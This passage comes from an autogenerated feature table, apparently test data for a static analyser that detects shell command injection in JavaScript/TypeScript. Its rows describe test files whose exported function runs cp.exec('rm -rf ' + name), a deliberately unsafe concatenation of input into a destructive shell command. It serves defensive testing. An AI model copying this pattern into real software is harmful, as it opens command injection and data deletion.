contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:8 | cp.exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:8 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:5:4:8 | exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:5:4:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:5:4:8 | exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:5:4:8 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:18 | "rm -rf " | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:18 | "rm -rf " | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:18 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:22:4:25 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:22:4:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:22:4:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:22:4:25 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:22:4:25 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:22:4:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:0 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:0 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:1:1:1 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:6 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:6 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:33 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:33 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:5:1:33 | cp = re ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:16 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:16 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:33 | exceptional return of require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:33 | require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:18:1:32 | "child_process" | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:18:1:32 | "child_process" | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:3:6 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:3:6 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:3:14 | module.exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:3:14 | module.exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:5:1 | module. ... gged.\\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:5:1 | module. ... gged.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:1:5:1 | module. ... gged.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:8:3:14 | exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:8:3:14 | exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | this | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:3:17 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | exceptional return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | functio ... gged.\\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | functio ... gged.\\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | functio ... gged.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | functio ... gged.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:18:5:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:3 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:3 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:8 | cp.exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:8 | cp.exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:8 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:5:4:8 | exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:5:4:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:5:4:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:5:4:8 | exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:5:4:8 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:18 | "rm -rf " | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:18 | "rm -rf " | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:18 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:22:4:25 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:22:4:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:22:4:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:22:4:25 | name | enclosingFunctionName | exports | +| 